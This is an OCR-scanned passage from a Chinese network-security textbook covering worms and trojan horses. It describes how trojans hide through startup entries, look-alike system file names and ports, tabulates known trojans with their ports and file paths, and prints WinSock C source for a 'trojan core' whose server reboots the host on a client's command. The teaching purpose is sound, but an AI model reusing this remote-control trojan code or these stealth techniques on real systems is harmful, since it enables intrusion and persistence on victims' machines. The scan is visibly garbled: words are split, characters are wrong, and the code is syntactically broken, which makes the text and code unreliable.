继续 传播 ,曾经 一 周 的 累计 感染 量 就 突破 12 万 。 这 个 蠕虫 还 有 多 个 变种 ,其 第 三 代 变 种 还 
曾 伪装 成 * 刷 钻 软件 ”大 量 传播 。 

那么 究竟 是 什么 原因 导致 网 络 蠕虫 竟 有 如 此 的 杀伤 力 呢 ? 这 要 从 蠕虫 病毒 本 身 的 特点 
谈 起 。 

蠕虫 是 一 种 通过 网 络 传播 的 病毒 , 它 具 有 病毒 的 一 些 共性 ,如 传播 性 、 隐 项 性 .破坏 性 
等 ,同时 具有 自己 的 一 些 独特 特征 ,如 不 利用 文件 寄生 (有 的 只 存在 于 内 存 中 ), 对 网 络 造成 
拒绝 服务 ,与 黑客 技术 相 结合 等 等 。 在 产生 的 破坏 性 上 ,蠕虫 病毒 也 不 是 普通 病毒 所 能 比拟 
的 ,网 络 的 普及 和 发 展 使 得 蠕虫 可 以 在 极 短 的 时 间 内 蔓延 整个 网 络 ,造成 网 络 瘫痪 。 

蠕虫 是 一 种 程序 , 它 可 以 自我 复制 并 可 以 在 操作 系统 外 部 传播 ; 它 可 以 使 用 电子 邮件 
或 其 他 的 传输 机 制 来 将 自己 从 一 台 计 算 机 复制 到 另 一 台 计 算 机 。 蠕 虫 可 以 破坏 计算 机 数据 
和 安全 性 ,其 破坏 方式 在 很 多 方面 都 和 病毒 相同 ,所 不 同 的 是 ,蠕虫 是 在 系统 间 进 行 自身 
复制 。 

根据 使 用 者 的 情况 可 将 蠕虫 病毒 分 为 两 类 。 一 类 是 面向 企业 级 和 局 域 网 用 户 的 ,这 种 
病毒 利用 系统 漏洞 主动 进行 攻击 ,可 以 对 整个 互联 在 一 起 的 网 络 造成 灾难 性 的 后 果 。 例 如 
“sql 蠕虫 王 “ 冲 击 波 ”和 “震荡 波 ” 等 。 另 一 类 是 针对 个 人 用 户 的 ,主要 通过 电子 邮件 ,恶意 
网 页 形式 迅速 传播 。 这 类 蠕虫 病毒 包括 “ 爱 虫 “ 求 职 信 ” 等 。 在 这 两 类 蠕虫 病毒 中 ,第 一 类 
具有 很 大 的 主动 攻击 性 ,而 且 爆 发 也 有 一 定 的 突然 性 。 但 相对 来 说 , 查 杀 这 种 病毒 并 不 是 很 
难 。 第 二 种 病毒 的 传播 方式 比较 复杂 和 和 多样, 主要 通过 对 用 户 进 行 欺骗 和 诱导 ,造成 的 损失 
非常 大 ,同时 也 很 难 根除 。 例 如 “求职 信 ” 病 毒 ,在 2001 年 就 已 经 被 各 大 杀毒 厂商 发 现 ,但 直 
到 2004 年 年 底 , 该 病毒 依然 排 在 病毒 危害 排行 榜 的 首位 。 

归纳 起 来 ,蠕虫 病毒 具有 以 下 特点 : 

(1) 自我 繁殖 。 蠕 虫 在 本 质 上 已 经 演变 为 黑客 和 人 侵 的 自动 化 工具 , 当 蠕 虫 被 释放 后 ,从 
搜索 漏洞 ,到 利用 搜索 结果 攻击 系统 ,再 到 复制 副本 ,整个 流程 全 由 蠕虫 自身 主动 完成 。 就 
自主 性 而 言 , 这 一 点 有 别 于 通常 的 病毒 。 

(2) 利用 软件 漏洞 。 任 何 计算 机 系统 都 存在 漏洞 ,蠕虫 利用 系统 的 漏洞 获得 被 攻击 的 
计算 机 系统 的 相应 权限 ,使 其 自身 的 复制 和 传播 成 为 可 能 。 这 些 漏洞 是 各 种 各 样 的 ,有 的 是 
操作 系统 本 身 的 问题 ,有 的 是 应 用 服务 程序 的 问题 ,有 的 是 网 络 管理 人 员 的 配置 问题 。 正 是 
由 于 漏洞 产生 原因 的 复杂 性 ,导致 各 种 类 型 的 蠕虫 泛滥 。 

(3) 造成 网 络 拥塞 。 在 扫描 漏洞 主机 的 过 程 中 ,蠕虫 需要 判断 其 他 计算 机 是 否 存在 , 判 
断 特定 应 用 服务 是 否 存 在 ,判断 漏洞 是 否 存 在 ,等 等 ,这 不 可 避免 地 会 产生 附加 的 网 络 数据 
流量 。 同 时 蠕虫 副本 在 不 同 计算 机 之 间 传 递 ,或 者 向 随机 目标 发 出 的 攻击 数据 都 不 可 避免 
地 会 产生 大 量 的 网 络 数据 流量 。 即 使 是 不 包含 破坏 系统 正常 工作 的 恶意 代码 的 蠕虫 ,也 会 
因为 它 产 生 了 巨 量 的 网 络 流量 导致 整个 网 络 瘫痪 ,造成 经 济 损失 。 

(4) 消耗 系统 资源 。 蠕 虫 信 侵 到 计算 机 系统 之 后 ,会 在 被 感染 的 计算 机 上 产生 自己 的 
多 个 副本 ,每 个 副本 启动 搜索 程序 寻找 新 的 攻击 目标 。 大 量 的 进程 会 耗费 系统 的 资源 ,导致 
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系统 的 性 能 下 降 。 这 对 网 络 服务 器 的 影响 尤其 明显 。 
(5) 留 下 安全 隐患 。 大 部 分 蠕虫 会 搜集 扩散、 暴露 系统 敏感 信息 (如 用 户 信息 等 ), 并 
在 系统 中 留 下 后 门 。 这 些 都 会 导致 未 来 的 安全 隐患 。 


2.6.3 特洛伊 木马 


如 果 说 像 蠕 虫 那样 的 网 络 病毒 是 通过 自我 复制 给 用 户 和 网 络 造成 种 种 麻烦 ,那么 “ 特 洛 
伊 木 马 ” 则 有 更 明确 的 目标 一 一 潜伏 、 收 集 用 户 名 和 登录 密码 、 从 各 种 Internet 服务 提供 商 
那里 盗窃 用 户 的 注册 和 账号 信息 ,直接 从 中 获 利 。 

当 攻击 者 通过 本 章 所 述 的 各 种 攻击 方法 侵入 目标 计算 机 后 ,就 可 以 在 目标 计算 机 中 植 
入 特洛伊 木马 程序 。 木 马 程序 并 非 一 个 特定 的 程序 ,而 是 一 类 程序 ,它们 具有 共同 的 特点 。 
木马 程序 驻 留 在 目标 计算 机 里 ,在 目标 计算 机 系统 启动 的 时 候 , 特 洛 伊 木 马 自 动 启动 。 它 是 
包含 在 合法 程序 里 的 未 授权 代码 ,或 者 已 被 未 授权 代码 更 改过 的 合法 程序 ,或 者 看 起 来 像 是 
执行 用 户 希 望 和 需要 的 功能 的 代码 ,但 实际 执行 不 为 用 户 所 知 (或 不 希望 ) 的 功能 。 特 洛 伊 
木马 程序 可 以 做 任何 事情 , 它 能 够 以 任意 形式 出 现 。 

特洛伊 木马 通常 难以 发 现 和 删除 ,是 一 种 高 级 别 的 危险 ,也 是 最 受 黑 客 欢迎 的 工具 之 
一 。 通 过 运行 木马 的 客户 端 程序 ,黑客 可 以 操作 远程 计算 机 。 

2011 年 初 ,360 安全 中 心 称 : 根据 360 安全 卫士 用 户 使 用 “下 载 安全 扫描 ”和 “聊天 保 
护 ” 两 大 功能 的 统计 数据 测算 ,国内 每 天 有 超过 3000 万 个 木马 程序 在 网 上 流传 。 即 当 用 户 
从 网 络 中 下 载 文件 .接收 聊天 好 友 发 来 的 文件 时 ,每 天 有 超过 3000 万 个 文件 会 被 360 扫描 
检测 为 木马 程序 , 占 日 文件 传输 总 量 的 13%。 

“特洛伊 木马 ? 源 于 古 和 希腊 神话 。 硕 腊 军队 在 无 法 战胜 特洛伊 军队 后 假装 撤退 ,并 留 下 
一 只 藏 有 士兵 的 大 木马 ,特洛伊 人 打开 城 门将 木马 移 和 城中。 夜晚 , 当 特 洛 伊人 庆祝 胜利 
时 , 躲 在 木马 中 的 希腊 战士 趁机 打开 城 门 ,希腊 军 队 便 蜂 拥 而 人 ,将 特洛伊 城 夷 为 平地 。 因 
此 ,“ 特 洛 伊 木 马 程序 "意味 着 危险 ,这 种 程序 表面 上 执行 正常 的 动作 ,但 实际 上 隐 含 着 一 些 
破坏 性 的 指令 。 当 不 小 心 让 这 种 程序 进入 系统 后 , 便 有 可 能 给 系统 带 来 危害 。 

近 几 年 常见 的 木马 有 网 购 木马 ,游戏 木马 .连环 木马 .QQ 粘 虫 木马 等 。2012 年 流行 的 
网 购 交易 支持 木马 利用 组 策略 禁止 主流 安全 软件 运行 ,在 系统 无 保护 的 情况 下 ,在 买 家 网 购 
付款 环节 轻易 算 改 交易 信息 ,使 买 家 要 购买 的 东西 没有 支付 , 却 替 病毒 作者 购买 了 游戏 或 手 
机 充值 卡 ; 456 游戏 木马 是 捆绑 在 456 游戏 大 厅 中 并 利用 456 游戏 加 载 的 远 控 木马 或 盗号 
木马 ,主要 通过 劫持 456 游戏 的 dzip32. dll 执行 第 三 方程 序 加 载 启 动 病毒 动态 链接 库 , 然 后 
远程 控制 木马 程序 并 执行 ; 传奇 私服 支持 者 是 与 传奇 私服 登录 器 捆绑 的 流量 动 持 木马 , 通 
过 DNS 支持 、hosts 劫持 、 驱 动 劫持 等 方式 把 大 量 的 私服 网 站 解析 到 一 个 固定 的 私服 网 站 , 
以 达到 流量 劫持 的 目的 ; QQ 粘 虫 木马 则 是 以 透明 窗 体 覆 盖 QQ 登录 框 或 伪造 QQ 登录 / 
重新 登录 框 的 盗号 木马 。 

大 部 分 木马 程序 以 二 进 制 形式 存在 ,经 过 编译 后 无 法 直接 阅读 。 在 特定 编辑 器 中 ,仍然 
只 有 可 以 打印 的 字符 ,如 程序 中 的 错误 信息 、 建 议 . 选 择 项 等 才能 够 被 人 们 理解 。 木 马 程序 
也 可 以 在 一 些 没有 被 编译 的 可 执行 文件 中 发 现 ,如 外 壳 脚 本 (shell script) 文 件 , 或 者 是 用 
Perl、JavaScript、VB Script 或 Tcl 书写 的 程序 等 。 

木马 常常 被 放 在 文件 服务 器 WWW 服务 器 中 ,一 旦 用 户 不 小 心 下 载 后 执行 了 它们 ,这 
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些 木马 会 将 用 户主 机 中 一 些 重要 的 文件 发 送出 去 ,并 且 在 当前 主机 上 留 下 后 门 ,默默 地 在 某 
一 端口 进行 侦 听 。 如 果 在 该 端口 收 到 数据 ,木马 识别 这 些 数据 ,然后 按 识别 后 的 命令 在 目标 
计算 机 上 执行 一 些 操作 ,如 窃取 口令 ,复制 或 删除 文件 ,或 重新 启动 计算 机 等 。 

因此 ,从 互联 网 上 下 载 软件 (特别 是 免费 软件 或 共享 软件 ) 、 从 匿名 服务 器 或 新 闻 组 中 获 
得 程序 时 ,都 要 特别 小 心 。 


2.6.4 木马 的 特点 


木马 的 特点 包括 隐蔽 性 、 奖 固 性 ,潜伏 性 。 木 马 有 其 不 为 人 知 的 目的 ,必须 具有 隐蔽 的 
性 能 ,大 部 分 木马 采用 了 一 些 隐 蔽 的 办 法 。 木 马 的 顽固 性 是 指 难以 删除 ,一 般 木马 进入 用 户 
主机 以 后 ,会 和 操作 系统 合 为 一 体 。 木 马 的 潜伏 性 也 相当 重要 ,如 果木 马 能 像 特 务 一 样 潜伏 
在 某 个 位 置 , 当 暴露 的 木马 被 删除 以 后 ,备用 的 木马 能 启动 继续 打开 端口 ,让 黑客 进入 ,木马 
的 生存 能 力 将 提高 许多 倍 。 

2.6.4.1 隐蔽 性 

木马 的 隐蔽 性 主要 表现 在 以 下 几 个 方面 。 

1. 木马 的 启动 方式 

木马 最 容易 下 手 的 地 方 有 3 处 : 系统 注册 表 .win. ini、system. ini。 计 算 机 启动 时 ,首先 
装载 这 3 个 文件 ,所 以 大 部 分 木马 使 用 这 3 种 方式 之 一 来 启动 。 但 是 木马 schoolbus 1. 60 
版 本 采用 替换 Windows 启动 程序 装载 ,这 种 启动 办 法 更 加 隐藏 ,而 且 不 易 排除 。 另 外 ,也 有 
捆绑 方式 启动 的 ,木马 phAse 1.0 版 本 和 NetBus 1. 53 版 本 就 以 拥 绑 方式 装 到 目标 计算 机 
上 , 既 可 以 捆绑 到 启动 程序 上 ,也 可 以 捆绑 到 一 般 的 常用 程序 上 。 如 果 捆 绑 到 一 般 程序 上 ， 
启动 是 不 确定 的 ,如 果 用 户 不 运行 ,木马 就 不 会 进入 内 存 。 

捆绑 方式 是 一 种 手动 的 安装 方式 ,一般 捆绑 的 是 非 自动 方式 启动 的 木马 。 

非 捆 绑 方式 的 木马 因为 会 在 注册 表 等 位 置 留 下 痕迹 ,所 以 ,很 容易 被 发 现 , 而 拥 绑 木 马 
可 以 由 黑客 自己 确定 捆绑 方式 .捆绑 位 置 、 拥 绑 程 序 等 ,位 置 的 多 变 使 得 木马 具有 很 强 的 隐 
蔽 性 ,生存 能 力 比较 强 。 

2. 木马 在 硬盘 上 存储 的 位 置 

木马 实际 上 是 一 个 可 以 执行 的 文件 ,所 以 它 必然 会 存储 在 硬盘 上 。 通 常 ,木马 存储 在 
C:\WINDOWS 和 C:\WINDOWS\System 中 ,这 也 体现 了 木马 程序 的 隐蔽 和 狐 独 。 木 马 
为 什么 要 在 这 两 个 目录 下 呢 ? 因为 Windows 的 一 些 系统 文件 在 这 两 个 位 置 ,如 果 用 户 误 删 
了 文件 ,用 户 的 计算 机 可 能 崩 演 ,从 而 不 得 不 重新 安装 系统 。 而 且 ,系统 目录 下 的 文件 众多 ， 
一 般 用 户 很 难 查找 出 哪个 文件 是 木马 。 

3. 木马 的 文件 名 

木马 的 文件 名 一 般 与 Windows 的 系统 文件 名 接近 ,这 样 用 户 不 敢 轻 易 删除 。 例 如 , 木 
马 SubSeven 1.7 版 本 的 服务 器 文件 名 是 C:\WINDOWS\KERNEL16. DLL, 而 Windows 
的 一 个 重要 系统 文件 是 C:\WINDOWS\KERNEL32. DLL, 二 者 非常 相似 ,一 般 用 户 很 难 
判断 , 删 错 的 后 果 极 其 严重 ,因为 删除 了 KERNEL32. DLL 意味 着 用 户 的 计算 机 将 崩溃 。 
木马 phAse 1.0 版 本 生成 的 木马 是 C:\WINDOWS\System\Msgsvr32. exe, 和 Windows 的 
系统 文件 C:\WINDOWS\System\ Msgsrv32. exe 一 模 一 样 , 只 是 图 标 有 一 点 区 别 。 
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上 面 两 个 是 假扮 系统 文件 的 类 型 ,还 有 一 些 无 中 生 有 的 类 型 ,木马 SubSeven 1. 5 版 本 
服务 器 文件 名 是 C:\WINDOWS\ Window. exe, 仅 仅 少 一 个 “s”, 一 般 用 户 如 果 不 知道 这 是 
木马 ,肯定 不 敢 删除 它 。 

4. 木马 的 文件 属性 

在 Windows 的 资源 管理 器 中 可 以 看 到 硬盘 上 的 文件 ,默认 方式 下 隐 含 文件 和 DLL 等 
系统 文件 不 显示 ,部 分 木马 也 采用 这 种 办 法 ,让 用 户 在 硬盘 上 看 不 到 ,如 果 用 户 不 注意 ,就 难 
以 发 现 森马。 木马 schoolbus 2. 0 版 本 的 木马 是 一 个 隐 含 文件 。 

5. 木马 的 图 标 

木马 服务 器 的 图 标 极 易 给 用 户 造 成 假 相 , 使 其 以 为 是 不 能 删除 的 系统 文件 , 表 2.2 列 出 
了 一 些 常见 的 木马 图 标 。 


表 2.2 常见 的 木马 图 标 


木马 名 称 图 标 


木马 Deep Throat 1.0 版 本 的 服务 器 systempatch. exe 
木马 GirlFriend 1. 3 版 本 的 服务 器 Windll. exe 

木马 Glacier( 冰 河 1. 2 正式 版 ) 的 服务 器 Kernel32. exe 
木马 InCommand 1. 0 版 本 的 服务 器 server. exe 


木马 school 的 服务 器 Grcframe. exe 混 


6. 木马 使 用 的 端口 

黑客 要 进入 目标 计算 机 ,必须 要 有 通 往 目 标 计算 机 的 途径 ,也 就 是 说 ,木马 必须 打开 某 
个 端口 ,这 个 端口 称 为 后门 ”, 因 此 木马 也 叫 “ 后 门 工 具 ”。 这 个 不 得 不 打开 的 后 门 是 很 难 隐 
蔽 的 ,只 能 采取 混淆 的 办 法 ,很 多 木马 的 端口 是 固定 的 ,让 人 一 眼 就 能 看 出 是 什么 样 的 木马 
造成 的 。 所 以 ,改变 端口 号 是 一 种 混淆 的 办 法 。 

从 已 有 的 木马 来 看 ,7306 端口 是 木马 netspy 使 用 的 。 木 马 SUB7 可 以 改变 端口 号 ， 
SUB7 默认 的 端口 是 1243, 如 果 没 有 改变 ,那么 目标 计算 机 的 用 户 就 可 以 使 用 删除 SUB7 的 
办 法 删除 它 。 比 较 隐蔽 的 木马 可 以 改变 端口 号 ,因而 目标 计算 机 的 用 户 不 易 察觉 。 

7. 木马 运行 时 的 隐藏 

木马 在 运行 的 时 候 一 般 都 是 隐蔽 的 ,与 正常 的 应 用 程序 在 运行 时 一 般 会 显示 一 个 图 标 
的 情况 不 同 ,木马 运行 时 不 会 在 目标 计算 机 上 打开 一 个 窗口 ,告诉 用 户 , 什 么 人 在 用 户 的 计 
算 机 中 干什么 ,因而 ,用 户 不 太 容易 发 现 正 在 悄悄 运行 的 木马 。 

8. 木马 在 内 存 中 的 隐蔽 

一 般 情况 下 ,如 果 某 个 程序 出 现 异 常 ,用 正常 的 手段 不 能 退出 的 时 候 , 采 取 的 办 法 是 按 
Ctrl 十 Alt 十 Del 键 ,跳出 一 个 窗口 ,找到 需要 终止 的 程序 ,然后 关闭 它 。 早 期 的 木马 会 在 按 
Ctrl 十 Alt 十 Del 键 时 显露 出 来 ,但 现在 大 多 数 木 马 已 经 看 不 到 了 。 所 以 只 能 采用 内 存 工具 
查看 内 存 , 才 会 发 现存 在 木马 。 

2.6.4.2 顽固 性 

一 旦 在 计算 机 中 发 现 木马 ,用 户 很 难 删除 它 。 例 如 ,木马 schoolbus 1. 60 版 本 和 2. 0 版 
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本 的 启动 位 置 是 在 C:\WINDOWS\System\runonce. exe 中 ,用 户 很 难 修改 这 个 文件 ,只 有 
重新 安装 这 个 文件 才 可 以 排除 木马 。 

再 如 ,木马 YAI 07. 29 1999 版 本 会 使 大 面积 的 程序 染 上 木马 ,导致 用 户 不 得 不 格式 化 
硬盘 ,因为 用 户 不 可 能 一 个 一 个 文件 删除 。 这 种 类 型 的 木马 最 好 是 通过 杀毒 软件 来 删除 。 

2.6.4.3 潜伏 性 

高 级 的 木马 具有 潜伏 的 能 力 ,表面 上 的 木马 被 发 现 并 删除 以 后 ,后 备 的 木马 在 一 定 的 条 
件 下 会 启动 。 这 种 条 件 主要 是 目标 计算 机 用 户 的 某 些 操作 。 

先 来 看 一 个 典型 的 例子 : 木马 Glacier( 冰 河 1. 2 正式 版 )。 

这 个 木马 有 两 个 服务 器 程序 ,C:\WINDOWS\System\Kernel32. exe 挂 在 注册 表 的 启 
动 组 中 , 当 计算 机 启动 时 会 装 入 内 存 , 这 是 表面 上 的 木马 。 另 一 个 是 C:\ WINDOWS \ 
System\Sysexplr. exe, 也 在 注册 表 中 , 它 修改 了 文本 文件 的 关联 , 当 用 户 单 击 文本 文件 的 时 
候 , 它 就 启动 了 , 它 会 检查 Kernel32. exe 是 否 存在 ,如 果 存 在 ,什么 事情 也 不 做 。 

当 表 面 上 的 木马 Kernel32. exe 被 发 现 并 删除 以 后 ,目标 计算 机 的 用 户 可 能 会 觉得 应 该 
是 安全 的 了 。 但 是 如 果 目 标 计 算 机 的 用 户 在 以 后 单 击 了 文本 文件 ,那么 这 个 文本 文件 照样 
运行 ,同时 Sysexplr. exe 被 启动 了 。Sysexplr. exe 会 发 现 表 面 上 的 木马 Kernel32. exe 已 经 
被 删除 ,就 会 再 生成 一 个 Kernel32. exe, 于 是 ,目标 计算 机 以 后 每 次 启动 时 木马 又 被 装 入 
内 存 。 

这 是 一 个 典型 的 具有 潜伏 能 力 的 木马 ,这 种 木马 的 隐蔽 性 更 强 。 


2.6.5 发 现 木马 


目前 发 现 的 木马 有 一 定 的 特征 , 表 2. 3 列 出 已 经 发 现 的 木马 的 特征 。 
表 2.3 已 发 现 的 木马 的 特征 





木马 名 称 端 口 启动 方式 木马 位 置 
bo 1. 20 可 变 ,31337 注册 表 加 载 C:\WINDOWS\System\ . exe 
BoBo 1. 0a 固定 ,4321 注册 表 加 载 C:\WINDOWS\System\Dllclient. exe 
Deep Throat 1.0 固定 ,2140,3150 注册 表 加 载 不 能 确定 
Deep Throat 3.0 可 变 ,2140,3150,6671 ”注册 表 加 载 C:\WINDOWS\Systray. exe 
DirectSockets. b 固定 ,5000 注册 表 加 载 C:\WINDOWS\System\ MSchv32. exe 
DRaT 固定 ,48 注册 表 加 载 C:\WINDOWS\Shell32. exe 
Glacier 1.2 固定 ,7626 注册 表 加 载 C:\WINDOWS\System\Kernel32. exe 

C:\WINDOWS\System\Sysexplr. exe 

Glacier 2.0 可 变 ,7626 注册 表 加 载 C:\WINDOWS\System\Kernel32. exe 


C:\WINDOWS\System\Sysexplr. exe 
C:\WINDOWS\System\Kernel32. exe 


Gleer ey Se C:\WINDOWS\System\Sysexplr. exe 

Glacier DARKSUN ”可 变 ,7626 注册 表 加 载 C:\WINDOWS\System\Kernel32. exe 
C:\WINDOWS\System\Sysexplr. exe 

InCommand 1.0 可 变 ,9400,9401,9402 ”注册 表 加 载 不 能 确定 

Insane Network4 固定 ,2000 无 不 能 确定 

IRC 固定 ,6969 win. ini 加 载 C:\WINDOWS\Rundlls. exe 


C:\WINDOWS\Closew. bat 
Jammerkillah 1.2 可 变 ,121 注册 表 加 载 C:\WINDOWS\System\ MsWin32. drv 
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续 表 
木马 名 称 端 口 启动 方式 木马 位 置 
Kuang2v ,17300 系统 文件 启动 C:\WINDOWS\trdq. exe 
Millenium 1.0 *20000,20001 注册 表 加 载 C:\WINDOWS\System\reg66. exe 
或 win. ini 加 载 
NetBus 1. 53 ,12345,12346 无 不 能 确定 
NetBus 1. 60 ,12345,12346 注册 表 加 载 C:\WINDOWS\MRING. EXE 
NetBus 1.70 ,12345,12346 注册 表 加 载 C:\WINDOWS\PATCH. EXE 
Netspy 1.0 ,7306 注册 表 加 载 C:\WINDOWS\System\netspy. exe 
Netspy 2.0 可 变 ,7306 注册 表 加 载 C:\WINDOWS\System\netspy. exe 
C:\WINDOWS\System\NETSPY. dat 
Open Share ,139 注册 表 加 载 无 文件 形式 木马 
phAse 1.0 ,555， 无 或 注册 表 加 载 “不 能 确定 C:\WINDOWS\System\msgsvr32. 
可 变 ,555 exe( 可 变 ) 
prosiak 0. 47 定 ,22222,33333 注册 表 加 载 C:\WINDOWS\System\ Windll32. exe 
ProcSpy ,7307 无 不 能 确定 
Remote-Anything 4000,3996 注册 表 加 载 C:\WINDOWS\SLAVE. EXE 
school 1. 09 ,7509 无 不 能 确定 
schoolbus ,3210,4321 注册 表 加 载 C:\WINDOWS\System\Grcframe. exe 
schoolbus 1. 60 ,54321,43210 捆绑 文件 C:\WINDOWS\System\grcframe. exe( 木 马 ) 
C:\WINDOWS\System\runonce. exe( 启 动 文件 ) 
schoolbus 2.0 可 变 ,54321,44767 捆绑 文件 C:\WINDOWS\System\grcframe. exe( 木 马 ) 
C:\WINDOWS\System\runonce. exe( 启 动 文件 ) 
SubSeven 1.0 固定 ,6713,1243 注册 表 加 载 C:\WINDOWS\SysTrayIcon. Exe 
SubSeven 1.1 可 变 ,1243 注册 表 加 载 C:\WINDOWS\SysTrayIcon. Exe 
SubSeven 1.3 可 变 ,6711,6776,1243 win. ini 加 载 C:\WINDOWS\nodll. exe 
C:\WINDOWS\ ~ win. bak 
C:\WINDOWS\ window. exe 
SubSeven 1.4 可 变 ,1243 win. ini 加 载 
SubSeven 1.5 可 变 ,6711,6776,1243 win. ini 加 载 C:\WINDOWS\nodll. exe 
C:\WINDOWS\winduh. dat 
C:\WINDOWS\ window. exe 
SubSeven 1.6 可 变 ,6711,6776,1243 ”注册 表 加 载 C:\WINDOWS\System\rundll16. com 
C:\WINDOWS\System\systray. exe 
SubSeven 1.7 可 变 ,6711,6776,1243 ”注册 表 加 载 C:\WINDOWS\KERNEL16. DL 
SubSeven 1.8 可 变 ,6711,6776,1243 system. ini 加 载 。 C:\WINDOWS\kernel32. dl 
Subseven 1.9 可 变 ,6711,6776,1243 system.ini 加 载 。 C:\WINDOWS\mtmtask. dl 
SubSeven 2.0 可 变 ,1243,6776 system. ini 加载 。C:\WINDOWS\kernel. exe 
SubSeven 2.1 可 变 ,27374 无 C:\WINDOWS\ MSREXE. exe 
WinCrash 1.03 固定 ,5742 注册 表 加 载 C:\WINDOWS\System\server. exe 
XSPY1.0 固定 ,7308 无 不 能 确定 
YAI 07. 29 1999 可 变 ,1024 不 能 确定 C:\WINDOWS\System\Odbcl6m. exe 


2.6.6 木马 的 实现 


神秘 的 木马 实现 起 来 并 没有 想象 中 那么 难 。 下 面 的 代码 用 WinSock 实现 了 一 个 客户 
端 程序 和 一 个 服务 器 程序 ,已 经 包含 了 木马 的 核心 功能 一 一 远程 控制 用 户 的 计算 机 。 在 这 
个 实例 中 ,服务 器 接 到 客户 机 的 命令 后 会 重新 启动 计算 机 。 还 可 以 在 这 两 个 程序 的 基础 上 
加 入 一 些 命令 ,对 目标 系统 进行 一 些 修改 ,如 复制 文件 等 。 
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2.6.6.1 服务 器 程序 

# include < windows.h> 

# include < winsock.h> 

# define PORTNUM 5000 

#define MAX_PENDING CONNECTS 4 
//of pending connections 

int WINAPI WinMain( 


// 定义 端口 号 为 5000 
// 定义 最 大 队列 长 度 


HINSTANCE hInstance, // 当 前 实例 的 句柄 
HINSTANCE hprevInstance, // 前 一 个 实例 的 句柄 
LPTSTR lpCmdLine, // 命 令 行 指针 
int nCmdShow 

// 展 示 窗 口 状态 

{ 
int index = 0, // 索 引 
iReturn; // 返 回 值 
char szServerA[100]; //aScII 字符 串 
TCHAR szServerW[100]; //Unicode 字符 串 
TCHAR szError[100]; // 错 误 消息 字符 串 
SOCKET WinSocket = INVALID SOCKET, //Window 套 接 字 
ClientSock = INVALID SOCKET; // 接 入 的 套 接 字 
SOCKADDR_IN local_sin, // 本 地 套 接 字 地 址 
accept_sin; // 收 到 的 客户 端 地 址 
int accept_sin_len; // 长 度 
WSADATA WSAData; // 窗 口 包含 的 数据 


// 初 始 化 


if(WSAStartup(MAKEWORD(1,1), &WSAData)!= 0) 


{ 


wsprintf(szError, TEXT("WSAStartup failed. Error: 


%d"), WSAGetLastError()); 


MessageBox(NULL, szError, TEXT("Error"), MB _OK); 


return FALSE; 
} 
// 创 建 一 个 TCP 流 机 制 的 套 接 字 


if( (WinSocket = socket (AF_INET, SOCK_STREAM, 0)) == INVALID SOCKET) 


{ 


wsprintf (szError, TEXT("Allocating socket failed. Error: %d"), WSAGetLastError ()); 
MessageBox (NULL, szError, TEXT("Error"), MB_OK); 


return FALSE; 
} 
// 填 写 地 址 信息 
local_ sin. sin family = AF_INET; 


local_sin. sin port = htons (PORTNUM); 

local_sin. sin addr.s addr = htonl (INADDR_ANY); 

// 进 行 捆绑 

if (bind (WinSocket, (struct sockaddr * ) &local sin, sizeof (local sin)) == SOCKET 

ERROR) 

{ 
wsprintf (szError, TEXT("Binding socket failed. Error: %d"), WSAGetLastError ()); 
MessageBox (NULL, szError, TEXT("Error"), MB_OK); 
closesocket (WinSocket); 


第 2 章 常见 的 网 络 攻击 技术 73 





return FALSE; 
} 
// 设 置 等 待 队列 
if(listen (WinSocket, MAX_PENDING CONNECTS) == SOCKET ERROR) 
{ 
wsprintf ( szError, TEXT ( " Listening to the client failed. Error: 多 d"), 
WSAGetLastError( )); 
MessageBox(NULL, szError, TEXT("Error"), MB OK); 
closesocket (WinSocket); 
return FALSE; 
} 
accept_sin len = sizeof (accept sin); 
// 阻 塞 ,等 待 客户 端的 请 求 
ClientSock = accept (WinSocket, (struct sockaddr * ) &accept sin, (int * ) &accept_sin_ 
len); 
// 关 闭 原来 的 套 接 字 
closesocket (WinSocket); 
if (ClientSock == INVALID SOCKET) 
wsprintf (szError, TEXT("Accepting client failed. Error: %d"), WSAGetLastError ()); 
MessageBox (NULL, szError, TEXT("Error"), MB_OK); 


return FALSE; 
} 
for (; ;) 
{ 
// 接 收 来 自 客户 端的 数据 
iReturn = recv (ClientSock, szServerA, sizeof (szServerA), 0); 
// 检 查 是 否 有 已 接收 的 数据 , 如 果 有 , 则 显示 
if (iReturn == SOCKET ERROR) 
{ 
wsprintf (szError, TEXT("No data is received, recv failed.") 
TEXT(" Error: %d"), WSAGetLastError ()); 
MessageBox (NULL, szError, TEXT("Server"), MB_OK); 
break; 
} 
else if (iReturn == 0) 
{ 
MessageBox (NULL, TEXT("Finished receiving "), TEXT("Server"),MB_OK); 
ExitWindowsEx(EWX_REBOOT, 0); // 注 销 用 户 ,重新 启动 系统 
break; 
} 
else 
{ 
// 将 ASCII 串 转 换 成 Unicode 串 
for (index = 0; index <= sizeof (szServerA); index++ ) 
szServerW[ index] = szServerA[ index]; 
// 显 示 收 到 的 信息 
MessageBox (NULL, szServerW, TEXT("Received From Client"), MB_OK); 
} 
} 


// 从 服务 器 向 客户 端 发 送 一 个 串 
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} 


证 (send (ClientSock, "To Client.", strlen ("To Client.") + 1, 0) == SOCKET ERROR) 

{ 
wsprintf( szError, TEXT("Sending data to client failed. Error: %d"),WSAGetIastError ()); 
MessageBox(NULL, szError, TEXT("Error"), MB OK); 

} 

// 关 闭 套 接 字 

shutdown (ClientSock, 0x02); 

closesocket (ClientSock); 

WSACleanup (); 

return TRUE; 


2.6.6.2 客户 端 程序 


# include < windows.h> 
# include < winsock.h> 


# define PORTNUM 5000 // 端 口号 

#define HOSTNRME "localhost" // 服 务 器 名 字 

int WINAPI WinMain ( 
HINSTANCE hInstance, // 当 前 实例 的 句柄 
HINSTANCE hPrevInstance, // 前 一 个 实例 的 句柄 
LPTSTR lpCmdLine, // 命 令 行 指针 
int nCmdShow 

) 

{ 
int index = 0; // 索 引 
int iReturn; // 返 回 值 
char szClientA[100]; //ASCII 字符 串 
TCHAR szClientW[100]; //Unicode 字符 串 
TCHAR szError[100]; // 错 误 消息 字符 串 
SOCKET ServerSock = INVALID_SOCKET;  // 服 务 器 的 套 接 字 
SOCKADDR_IN destination_sin; // 服 务 器 地 址 
PHOSTENT phostent = NULL; // 有 上 服务 器 HOSTENT 结构 的 指针 
WSADATA WSAData; 
// 套 接 字 的 实现 
// 初 始 化 


if(WSAStartup(MAKEWORD(1,1), &WSAData)!= 0) 

{ 
wsprintf( szError, TEXT("WSAStartup failed. Error: %d"), WSAGetLastError()); 
MessageBox (NULL, szError, TEXT("Error"), MB_OK); 
return FALSE; 

} 

// 创 建 套 接 字 

